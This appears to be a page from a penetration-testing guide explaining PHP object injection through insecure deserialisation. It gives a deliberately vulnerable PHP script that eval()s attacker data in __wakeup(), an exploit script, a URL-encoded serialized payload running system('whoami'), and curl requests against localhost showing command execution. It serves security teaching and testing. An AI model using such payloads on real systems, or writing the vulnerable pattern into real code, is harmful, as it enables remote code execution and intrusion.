The Pentesting Guide
TwitterBlog
  • The Pentesting Guide
  • ℹ️0 - Pre-Engagement
  • 🔍1 - Information Gathering
  • Passive (OSINT)
  • Active
    • 🕵️HUMINT
    • WIFI
    • IP & Port Scanning
    • Services
      • 21 - FTP
      • 22 - SSH
      • 25 - SMTP
      • 53 - DNS
      • 80,443 - WEB
      • 88 - Kerberos
      • 110 - POP3
      • 111 - rpcbind
      • 161 - SNMP
      • 389 - LDAP
      • 139,445 - SMB
      • Active Directory
  • 💣2 - Exploitation
  • Brute Forcing
  • WEB
    • Apache Tomcat
    • Authentication
    • Broken Access Control
    • Cache poisoning
    • Clickjacking
    • CORS
    • CSRF
    • File Inclusion
    • Host Header Injection
    • HTTP Request Smuggling
    • Information disclosure
    • JWT
    • OS command injection
    • PHP deserialisation
    • SQLi
    • SSRF
    • SSTI
    • Shellshock
    • Unrestricted File Upload
    • XSS
    • XXE
  • Web (OWASP Test cases)
    • 4.1 Information Gathering
    • 4.2 Configuration and Deployment Management Testing
    • 4.3 Identity Management Testing
    • 4.4 Authentication Testing
    • 4.5 Authorization Testing
    • 4.6 Session Management Testing
    • 4.7 Input Validation Testing
    • 4.8 Testing for Error Handling
    • 4.9 Testing for Weak Cryptography
    • 4.10 Business Logic Testing
    • 4.11 Client-side Testing
    • 4.12 API Testing
  • WIFI
  • HUMINT
    • 🎣Gophish (Phishing)
    • Malicious Phishing Files
    • Phishing Evaluation
  • BoF - Windows(x86)
  • Active Directory
    • Kerberos
    • GPOs
    • Certificates
    • LAPS
    • Domain Trusts
  • 👿3 - Post Exploitation
  • File transfer
  • Shells
  • Situational Awareness
    • Containers and VMs
    • Linux
    • Windows
      • Dumping Credentials
      • Countermeasure Evasion
    • Active Directory
      • BloodHound & SharpHound
  • General
    • Linux
    • Windows
  • Local Privilege Escalation
    • Linux
    • Windows
  • Persistance
    • Windows
  • Cracking
  • Pivoting
    • Tunnelling & Port Forwarding
  • Lateral Movement
  • WIFI
  • 📓4 - Report
  • 🧹5 - House cleaning
Powered by GitBook
On this page
  • Introduction
  • Proof of Concept
  • References
  1. WEB

PHP deserialisation

Introduction

First of all, let's explain what serialisation and deserialisation mean. The serialisation of an object transforms an object from Object Programming languages such as Java, Python or PHP into a format that can be stored or transferred. Deserailsation turns serialised objects from files or the network into ordinary programming objects.

An attacker could manipulate serialised objects to change the application's logic, perform a denial service, or execute arbitrary code when deserialised.

Proof of Concept

When you control a serialised object that is passed into unserialised(), you can control the properties of the created object. You might also be able to hijack the flow of the application by controlling the values passed into automatically executed methods like __wakeup(), or __destruct().

In this Proof of concept, the vulnerable code receives a serialised object through the GET parameter r, then unserialises it into an array, printing the first two values. However, an attacker could create its own inject variable, which value will be executed by the function eval just after the unserialize function was performed due to the function __ wakeup().

Vulnerable code:

<?php 
    class PHPObjectInjection{
        public $inject;
        function __construct(){
        }
        function __wakeup(){
            if(isset($this->inject)){
                eval($this->inject);
            }
        }
    }
    if(isset($_REQUEST['r'])){  
        $var1=unserialize($_REQUEST['r']);
        if(is_array($var1)){
            echo "<br/>".$var1[0]." - ".$var1[1];
        }
    }
    else{
        echo ""; # nothing happens here
    }
?> 

php -S localhost:8080 vuln.php

Exploit :

<?php 
    class PHPObjectInjection{
        public $inject = "system('whoami');";
    }
    echo urlencode(serialize(array("vul","nerable"))); # Basic serialized data
    echo "\n";
    echo urlencode(serialize(new PHPObjectInjection)); # Command execution (__wakeup)
?>
php exploit.php
# Intended use
a%3A2%3A%7Bi%3A0%3Bs%3A3%3A%22vul%22%3Bi%3A1%3Bs%3A7%3A%22nerable%22%3B%7D 
# Malicious use
O%3A18%3A%22PHPObjectInjection%22%3A1%3A%7Bs%3A6%3A%22inject%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D

Result:

As you can see below, because the attacker could replace the $inject variable with the command "whoami", the attacker gained RCE knowing the user who executed the PHP service.

curl http://localhost:8080?r=a%3A2%3A%7Bi%3A0%3Bs%3A3%3A%22vul%22%3Bi%3A1%3Bs%3A7%3A%22nerable%22%3B%7D
vul - nerable
curl http://localhost:8080?r=O%3A18%3A%22PHPObjectInjection%22%3A1%3A%7Bs%3A6%3A%22inject%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D
kali

References

Last updated 1 year ago

Several exploits [PayloadAllTheThings]
PHP Object Injection [OWASP]
Exploiting PHP deserialization [Medium]
Deserialization Cheat Sheet
Exploiting insecure deserialization vulnerabilities
Magic methods
What is Phar Deserialization